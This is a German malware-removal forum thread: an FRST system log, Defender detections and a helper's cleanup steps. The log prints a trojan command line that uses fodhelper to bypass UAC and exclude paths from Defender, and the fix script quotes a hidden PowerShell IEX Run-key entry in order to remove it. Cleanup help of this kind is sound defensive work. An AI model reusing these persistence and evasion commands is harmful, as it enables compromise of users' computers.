FirewallRules: [UDP Query User{F5608653-9B40-4701-88FD-100B73E9403A}D:\wintv8\wintv8\wintv8.exe] => (Allow) D:\wintv8\wintv8\wintv8.exe (Hauppauge Computer Works Inc. -> Hauppauge Computer Works, Inc.) [Datei ist nicht signiert]
FirewallRules: [TCP Query User{526947BC-B812-4C51-99FA-4A60CA3ED19C}D:\wintv8\wintv8\wintv8.exe] => (Allow) D:\wintv8\wintv8\wintv8.exe (Hauppauge Computer Works Inc. -> Hauppauge Computer Works, Inc.) [Datei ist nicht signiert]
FirewallRules: [UDP Query User{93C68686-2CB6-4577-8BC7-3E8F9B823CAC}E:\diablo iii\x64\diablo iii64.exe] => (Allow) E:\diablo iii\x64\diablo iii64.exe => Keine Datei
FirewallRules: [TCP Query User{75995366-9E52-45D2-9289-D6BF86F0C6DF}E:\diablo iii\x64\diablo iii64.exe] => (Allow) E:\diablo iii\x64\diablo iii64.exe => Keine Datei
FirewallRules: [TCP Query User{130259D6-E2A4-4429-9B59-ECB20FCB2AA5}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{8A450321-B524-492C-902C-77D4B1564C85}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [{06AC1CED-FE59-4DF7-90C8-B400001E2A38}] => (Allow) E:\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{02F5B165-4217-4EFF-8E8D-83477830AC28}] => (Allow) E:\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{33D2E234-3DD2-4D9B-9F49-57B4D6987D1B}] => (Allow) E:\Steam\bin\cef\cef.win7\steamwebhelper.exe => Keine Datei
FirewallRules: [{FCFEB995-7034-4953-AD5A-59C6DA4AF7E6}] => (Allow) E:\Steam\bin\cef\cef.win7\steamwebhelper.exe => Keine Datei
FirewallRules: [TCP Query User{97C66B7E-E00B-40A2-99E8-2F46451A5F4F}E:\overwatch\overwatch\overwatch.exe] => (Block) E:\overwatch\overwatch\overwatch.exe => Keine Datei
FirewallRules: [UDP Query User{ADDCCCCD-6EF9-4684-9D8F-AEEACCD030EC}E:\overwatch\overwatch\overwatch.exe] => (Block) E:\overwatch\overwatch\overwatch.exe => Keine Datei
FirewallRules: [TCP Query User{92B36222-CF85-4E3B-B77A-1B421889E558}E:\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) E:\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe => Keine Datei
FirewallRules: [UDP Query User{5D9B96A1-0B5F-49FE-B34A-8C54A052671F}E:\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) E:\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe => Keine Datei
FirewallRules: [TCP Query User{1483B170-1BDE-452D-888E-8429224BF22C}C:\program files (x86)\overwatch test\overwatch.exe] => (Block) C:\program files (x86)\overwatch test\overwatch.exe => Keine Datei
FirewallRules: [UDP Query User{CE9DBE9F-FE1F-4507-84CF-241D1A14F0B8}C:\program files (x86)\overwatch test\overwatch.exe] => (Block) C:\program files (x86)\overwatch test\overwatch.exe => Keine Datei
FirewallRules: [{BC602CC9-6E07-4C53-97E5-F0971111970F}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{C3F27F2D-6989-48F2-866B-991A4DC17DC4}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [TCP Query User{87481E29-CA0A-4151-A3D1-F99C71778FB8}D:\plex media server\plex media server.exe] => (Allow) D:\plex media server\plex media server.exe (Plex, Inc -> Plex, Inc.)
FirewallRules: [UDP Query User{82523D6E-E906-4E71-9B06-A72BEF78D0B2}D:\plex media server\plex media server.exe] => (Allow) D:\plex media server\plex media server.exe (Plex, Inc -> Plex, Inc.)
FirewallRules: [TCP Query User{057EF7B5-10EA-41CA-A07E-D936B292BD9B}D:\plex media server\plex dlna server.exe] => (Allow) D:\plex media server\plex dlna server.exe (Plex, Inc -> Plex, Inc.)
FirewallRules: [UDP Query User{5F62BAE5-7CD5-448B-B6D3-AD16ADF30186}D:\plex media server\plex dlna server.exe] => (Allow) D:\plex media server\plex dlna server.exe (Plex, Inc -> Plex, Inc.)
FirewallRules: [TCP Query User{FC34C768-7EAD-4BEA-B5B7-C02AEE198F18}C:\program files (x86)\bluestacks\hd-player.exe] => (Allow) C:\program files (x86)\bluestacks\hd-player.exe => Keine Datei
FirewallRules: [UDP Query User{BD213B2A-7DE7-41A3-AA65-09025ED6DFA1}C:\program files (x86)\bluestacks\hd-player.exe] => (Allow) C:\program files (x86)\bluestacks\hd-player.exe => Keine Datei
FirewallRules: [TCP Query User{AE5307D5-5929-4D5A-99E3-3FE4615B59B1}D:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) D:\program files (x86)\myphoneexplorer\myphoneexplorer.exe (Franz Josef Wechselberger -> F.J. Wechselberger)
FirewallRules: [UDP Query User{04143737-9CB5-4740-9923-25965FC933F7}D:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) D:\program files (x86)\myphoneexplorer\myphoneexplorer.exe (Franz Josef Wechselberger -> F.J. Wechselberger)
FirewallRules: [TCP Query User{335D28D8-4C75-44C8-BD78-7E1A17EFAC60}C:\program files (x86)\destiny 2\destiny2.exe] => (Block) C:\program files (x86)\destiny 2\destiny2.exe => Keine Datei
FirewallRules: [UDP Query User{2F643029-1E60-47E9-AAE7-D79291091561}C:\program files (x86)\destiny 2\destiny2.exe] => (Block) C:\program files (x86)\destiny 2\destiny2.exe => Keine Datei
FirewallRules: [TCP Query User{2D074994-996A-4FF1-92DA-81553FFB54DD}C:\program files (x86)\synology\assistant\dsassistant.exe] => (Allow) C:\program files (x86)\synology\assistant\dsassistant.exe (Synology Inc. -> ) [Datei ist nicht signiert]
FirewallRules: [UDP Query User{6CA1D9CD-819C-4FDB-83E7-9010ECC0710A}C:\program files (x86)\synology\assistant\dsassistant.exe] => (Allow) C:\program files (x86)\synology\assistant\dsassistant.exe (Synology Inc. -> ) [Datei ist nicht signiert]
FirewallRules: [TCP Query User{9A6B212E-CA7C-4529-AFDF-E59032BC75BD}E:\epic games\unrealtournament\engine\binaries\win64\ue4-win64-shipping.exe] => (Block) E:\epic games\unrealtournament\engine\binaries\win64\ue4-win64-shipping.exe => Keine Datei
FirewallRules: [UDP Query User{5C628D85-721B-4B33-847F-F8E2BFEB0895}E:\epic games\unrealtournament\engine\binaries\win64\ue4-win64-shipping.exe] => (Block) E:\epic games\unrealtournament\engine\binaries\win64\ue4-win64-shipping.exe => Keine Datei
FirewallRules: [{92460299-B0C4-418C-9E30-35CF90DF66F7}] => (Allow) E:\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{EB4C3102-4B6F-4EF7-BE5C-62504D5E7730}] => (Allow) E:\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [TCP Query User{7F341781-5FCB-48AC-987A-82E3AFC54B37}D:\program files\sabnzbd\sabnzbd.exe] => (Allow) D:\program files\sabnzbd\sabnzbd.exe (The SABnzbd-team) [Datei ist nicht signiert]
FirewallRules: [UDP Query User{4A897FBC-7AD9-4F1F-97E8-112576AA8ACC}D:\program files\sabnzbd\sabnzbd.exe] => (Allow) D:\program files\sabnzbd\sabnzbd.exe (The SABnzbd-team) [Datei ist nicht signiert]
FirewallRules: [{59056172-75AC-49D6-84EA-11C525E39F71}] => (Allow) D:\Program Files\SABnzbd\SABnzbd.exe (The SABnzbd-team) [Datei ist nicht signiert]
FirewallRules: [{9943FCA0-3241-431A-A2FD-F4C64CC80D21}] => (Allow) C:\Program Files (x86)\StarMoney 12 Basic\ouservice\StarMoneyOnlineUpdate.exe (Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH)
FirewallRules: [{7225D833-F83B-428A-8E8F-AA68DA438437}] => (Allow) C:\Program Files (x86)\StarMoney 12 Basic\ouservice\StarMoneyOnlineUpdate.exe (Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH)
FirewallRules: [{4A733375-FD33-4FDA-AC25-B34D3106CE42}] => (Allow) C:\Program Files (x86)\StarMoney 12 Basic\app\StarMoney.exe (Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH)
FirewallRules: [{FE1B7EE1-9AAE-499F-8D65-3F963AB71747}] => (Allow) C:\Program Files (x86)\StarMoney 12 Basic\app\StarMoney.exe (Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH)
FirewallRules: [TCP Query User{C0E4811F-1315-44CE-925B-0F0DE359798F}C:\program files (x86)\overwatch league replay viewer\overwatch.exe] => (Allow) C:\program files (x86)\overwatch league replay viewer\overwatch.exe => Keine Datei
FirewallRules: [UDP Query User{E82A56D2-5A9B-4204-8AD9-9C9FF84FF448}C:\program files (x86)\overwatch league replay viewer\overwatch.exe] => (Allow) C:\program files (x86)\overwatch league replay viewer\overwatch.exe => Keine Datei
FirewallRules: [TCP Query User{133524D0-630F-4A87-A0DF-67184C829942}E:\destiny 2\destiny2.exe] => (Allow) E:\destiny 2\destiny2.exe => Keine Datei
FirewallRules: [UDP Query User{CF09EE33-CF54-4C7B-9769-4AAE8C43E3C8}E:\destiny 2\destiny2.exe] => (Allow) E:\destiny 2\destiny2.exe => Keine Datei
FirewallRules: [{4A4845DC-FB7B-4EA2-96DA-9BA5FB107EB0}] => (Allow) C:\Program Files (x86)\Origin Games\Command and Conquer Generals Zero Hour\Generals.exe (Kalloc Studios, Inc. -> Kalloc Studios) [Datei ist nicht signiert]
FirewallRules: [{0367493D-51B5-4A4E-8D8D-896CD5C5D555}] => (Allow) C:\Program Files (x86)\Origin Games\Command and Conquer Generals Zero Hour\Generals.exe (Kalloc Studios, Inc. -> Kalloc Studios) [Datei ist nicht signiert]
FirewallRules: [{F640C858-ADF7-43C4-880B-40AE87A6E4F6}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{684EE478-3EED-436D-997C-00C849CE4A66}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{B6C45732-5EC8-4AFE-9714-8FB8790869CD}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{9C336794-5583-46F4-868F-41C63707BD5F}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{7EE80D06-70E8-430C-89F3-3E5904D57162}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{D4DD4E03-A339-480A-906C-4ECE1B57815F}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{8DA22F59-7192-4F1D-B12B-DBF7DAD16F2E}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{BBC6F61C-54EE-4AFB-9B85-C0477FEAF35B}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{E957E06A-8D29-4115-8A1B-245C1B394D13}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.66.77.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{FC8AF37E-9F51-4B8D-921E-022022EAB3FE}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.66.77.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{02AC9F13-721D-4530-BC94-96A31822DEBF}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.66.77.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{6BE28DEB-BECD-401D-BDFD-2614A52F8A8A}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.66.77.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)

==================== Wiederherstellungspunkte =========================

25-11-2020 11:07:47 Geplanter Prüfpunkt
28-11-2020 13:26:43 DirectX wurde installiert

==================== Fehlerhafte Geräte im Gerätemanager ============

Name: HP EWS
Description: HP EWS
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: HP FAX
Description: HP FAX
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Fehlereinträge in der Ereignisanzeige: ========================

Applikationsfehler:
==================
Error: (12/02/2020 10:08:27 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Fehler in Manifest- oder Richtliniendatei "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" in Zeile  1.
Die im Manifest gefundene Komponenten-ID stimmt nicht mit der ID der angeforderten Komponente überein.
Verweis: UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition: UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Verwenden Sie das Programm "sxstrace.exe" für eine detaillierte Diagnose.

Error: (12/02/2020 02:41:01 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Fehler in Manifest- oder Richtliniendatei "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" in Zeile  1.
Die im Manifest gefundene Komponenten-ID stimmt nicht mit der ID der angeforderten Komponente überein.
Verweis: UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition: UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Verwenden Sie das Programm "sxstrace.exe" für eine detaillierte Diagnose.

Error: (12/02/2020 02:40:55 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Fehler in Manifest- oder Richtliniendatei "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" in Zeile  1.
Die im Manifest gefundene Komponenten-ID stimmt nicht mit der ID der angeforderten Komponente überein.
Verweis: UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition: UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Verwenden Sie das Programm "sxstrace.exe" für eine detaillierte Diagnose.

Error: (12/02/2020 11:28:07 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Volume (I:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (12/02/2020 11:28:02 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Zwi_Lager (H:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (12/02/2020 11:27:47 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Daten (G:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (12/02/2020 11:27:46 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Medien (F:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (12/02/2020 11:27:42 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Spiele (E:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)


Systemfehler:
=============
Error: (12/02/2020 10:22:45 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "wuauserv" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{E60687F7-01A1-40AA-86AC-DB1CBF673334}

Error: (11/24/2020 06:26:45 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-HRMFF6U)
Description: Der Server "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (11/24/2020 06:26:45 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-HRMFF6U)
Description: Der Server "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (11/24/2020 10:54:11 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Mozilla Maintenance Service" wurde mit folgendem Fehler beendet:
Unzulässige Funktion.

Error: (11/23/2020 03:47:56 PM) (Source: disk) (EventID: 7) (User: )
Description: Fehlerhafter Block bei Gerät \Device\Harddisk2\DR4.

Error: (11/14/2020 03:18:38 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "HauppaugeTVServer" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 5000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (11/10/2020 10:56:14 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: Der Dienst "Machine Debug Manager" ist als interaktiver Dienst gekennzeichnet. Das System wurde jedoch so konfiguriert, dass interaktive Dienste nicht möglich sind. Der Dienst wird möglicherweise nicht richtig funktionieren.

Error: (11/10/2020 10:55:59 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Netzwerklistendienst" wurde mit folgendem Fehler beendet:
Das Gerät ist nicht bereit.


Windows Defender:
===================================
Date: 2020-12-02 22:25:29.9320000Z
Description:
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=BrowserModifier:Win32/Prifou&threatid=224074&enterprise=0
Name: BrowserModifier:Win32/Prifou
ID: 224074
Schweregrad: Hoch
Kategorie: Browserveränderer
Pfad: file:_C:\Users\Vincent\AppData\Roaming\Ranederapec.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: DESKTOP-HRMFF6U\Tom
Prozessname: C:\Users\Tom\Desktop\FRST64.exe
Sicherheitsversion: AV: 1.327.1933.0, AS: 1.327.1933.0, NIS: 1.327.1933.0
Modulversion: AM: 1.1.17600.5, NIS: 1.1.17600.5

Date: 2020-12-02 11:17:15.2310000Z
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {37BBC7C9-ECE9-436C-9C2F-12E32BAFC0D6}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2020-12-01 11:17:56.7110000Z
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {3B9EFD20-3A12-4BA9-B5A1-D926A6AD922F}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2020-11-30 11:41:00.5290000Z
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {88EDB4DB-6C6F-43CF-BCA4-B1F8BF02AFE5}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2020-11-28 10:50:40.9680000Z
Description:
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sobocat.A&threatid=2147733729&enterprise=0
Name: Trojan:Win32/Sobocat.A
ID: 2147733729
Schweregrad: Schwerwiegend
Kategorie: Trojaner
Pfad: CmdLine:_C:\Windows\System32\cmd.exe /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /v DelegateExecute /d /t REG_SZ && reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /d cmd /c start /min WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\Windows\SysWOW64\WindowsPowerShell\v1.0" /t REG_SZ && %SystemRoot%\system32\fodhelper.exe & ping -n 7 127.0.0.1 > NUL & reg delete HKCU\Software\Classes\ms-settings\shell\open\command /f
Erkennungsursprung: Unbekannt
Erkennungstype: Konkret
Erkennungsquelle: System
Benutzer: NT-AUTORITÄT\SYSTEM
Prozessname: Unknown
Sicherheitsversion: AV: 1.327.1687.0, AS: 1.327.1687.0, NIS: 1.327.1687.0
Modulversion: AM: 1.1.17600.5, NIS: 1.1.17600.5

CodeIntegrity:
===================================

Date: 2020-12-02 21:32:54.5040000Z
Description:
Windows blocked file \Device\HarddiskVolume11\Windows\System32\scrobj.dll which has been disallowed for protected processes.

Date: 2020-12-02 21:32:39.1240000Z
Description:
Windows blocked file \Device\HarddiskVolume11\Windows\System32\scrobj.dll which has been disallowed for protected processes.

Date: 2020-12-02 21:32:39.0420000Z
Description:
Windows blocked file \Device\HarddiskVolume11\Windows\System32\scrobj.dll which has been disallowed for protected processes.

==================== Speicherinformationen ===========================

BIOS: American Megatrends Inc. 0317 10/20/2016
Hauptplatine: ASUSTeK COMPUTER INC. PRIME H270-PRO
Prozessor: Intel(R) Core(TM) i5-7600 CPU @ 3.50GHz
Prozentuale Nutzung des RAM: 25%
Installierter physikalischer RAM: 16318.9 MB
Verfügbarer physikalischer RAM: 12127.19 MB
Summe virtueller Speicher: 18750.9 MB
Verfügbarer virtueller Speicher: 12990.48 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:232.29 GB) (Free:91.14 GB) NTFS
Drive d: (Programme) (Fixed) (Total:196.74 GB) (Free:83.74 GB) NTFS
Drive e: (Spiele) (Fixed) (Total:390.62 GB) (Free:92.32 GB) NTFS
Drive f: (Medien) (Fixed) (Total:1230.47 GB) (Free:105.66 GB) NTFS
Drive g: (Daten) (Fixed) (Total:195.31 GB) (Free:172.94 GB) NTFS
Drive h: (Zwi_Lager) (Fixed) (Total:390.62 GB) (Free:145.75 GB) NTFS
Drive i: (Volume) (Fixed) (Total:390.62 GB) (Free:59.39 GB) NTFS

\\?\Volume{79857743-b9df-46b3-96bf-e4e8d9a3cd63}\ () (Fixed) (Total:0.49 GB) (Free:0.04 GB) NTFS
\\?\Volume{71e4b085-1259-4f2a-94a3-b1ef97ec4058}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Partitionstabelle ====================

==========================================================
Disk: 0 (Protective MBR) (Size: 2794.5 GB) (Disk ID: 00000000)

Partition: GPT.

==========================================================
Disk: 1 (Protective MBR) (Size: 232.9 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt =======================

M-K-D-B 02.12.2020 22:35
Schritt 1
Die folgenden Programme sind veraltet, stören die Bereinigung oder es handelt sich um Werbesoftware bzw. unerwünschte Software (Adware, PUP) und müssen entfernt werden.
  • Deinstalliere über Start > Einstellungen > Apps bzw. Start > Systemsteuerung > Programme deinstallieren die folgenden Programme:
    • eSupport UndeletePlus
    • Updater
    • Web Companion
  • Starte den Rechner im Anschluss neu auf.
  • Gib eine kurze Rückmeldung, ob die Deinstallation erfolgreich war.





Schritt 2
  • Schließe alle offenen Programme und Internet Browser, damit keine Daten verloren gehen.
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    Start::
    CloseProcesses:
    HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Run: [aedffcbccbfe] => powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable('aedffcbccbfe', 'User'))" <==== ACHTUNG
    DeleteKey: HKU\S-1-5-21-3451750051-380284315-2914928687-1002\Software\aedffcbccbfe
    DeleteKey: HKU\S-1-5-21-3451750051-380284315-2914928687-1002\Environment\aedffcbccbfe
    DeleteValue: HKU\S-1-5-21-3451750051-380284315-2914928687-1002\Environment|aedffcbccbfe
    DeleteValue: HKU\S-1-5-21-3451750051-380284315-2914928687-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|aedffcbccbfe
    CMD: type "C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mounten.bat"
    Task: {A9488763-4F15-4C35-96F7-11315EA3F955} - System32\Tasks\WebDiscover Browser Update Task => C:\Users\Vincent\AppData\Local\WebDiscoverBrowser\4.28.2\browser.exe <==== ACHTUNG
    C:\Users\Vincent\AppData\Local\WebDiscoverBrowser
    FF HomepageOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Disabled: web@fd9b3d8a-1178-45ab-92a8-a172d0b7c32e
    FF NewTabOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Disabled: {d04b0b40-3dab-4f0b-97a6-04ec3eddbfb0}
    CMD: ipconfig /flushdns
    CMD: netsh winsock reset
    CMD: netsh advfirewall reset
    CMD: netsh advfirewall set allprofiles state ON
    CMD: Bitsadmin /Reset /Allusers
    powershell: Set-MpPreference -PUAProtection Enabled
    Hosts:
    RemoveProxy:
    SystemRestore: On
    EmptyTemp:
    End::
  • Starte nun FRST und klicke direkt den Reparieren Button.
    Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.





Schritt 3
  • Starte FRST erneut. Kopiere den Inhalt der folgenden Code-Box oben in das Suchfeld:
    Code:
    SearchAll: aedffcbccbfe
  • Klicke auf den Button Datei-Suche.
  • FRST beginnt mit dem Suchlauf. Das kann einige Zeit dauern, bitte gedulde dich!
  • Am Ende wird eine Textdatei Search.txt erstellt.
  • Poste mir deren Inhalt mit deiner nächsten Antwort.





Schritt 4
  • Starte FRST erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und drücke auf Untersuchen.
  • FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner nächsten Antwort.





Bitte poste mit deiner nächsten Antwort:
  • eine Rückmeldung bezüglich der Deinstallationen
  • die Logdatei des FRST-Fix (fixlog.txt)
  • die Logdatei des FRST-Suchlaufs (Search.txt)
  • die beiden neuen Logdateien von FRST (FRST.txt und Addition.txt)

Rupsi 02.12.2020 22:40
Schritt 1:
eSupport UndeletePlus -> deinstalliert
Updater -> deinstallation abgebrochen, konnte nicht gefunden werden...ö
Web Companion -> deinstalliert

M-K-D-B 02.12.2020 22:44
Ok, dann weiter mit den Schritten 2 bis 4 und die Logdateien nacheiannder posten. :)
Danach sehen wir weiter.

Rupsi 02.12.2020 22:58
Code:
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 02-12-2020
durchgeführt von Tom (02-12-2020 22:43:28) Run:1
Gestartet von C:\Users\Tom\Desktop
Geladene Profile: Tom
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
CloseProcesses:
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Run: [aedffcbccbfe] => powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable('aedffcbccbfe', 'User'))" <==== ACHTUNG
DeleteKey: HKU\S-1-5-21-3451750051-380284315-2914928687-1002\Software\aedffcbccbfe
DeleteKey: HKU\S-1-5-21-3451750051-380284315-2914928687-1002\Environment\aedffcbccbfe
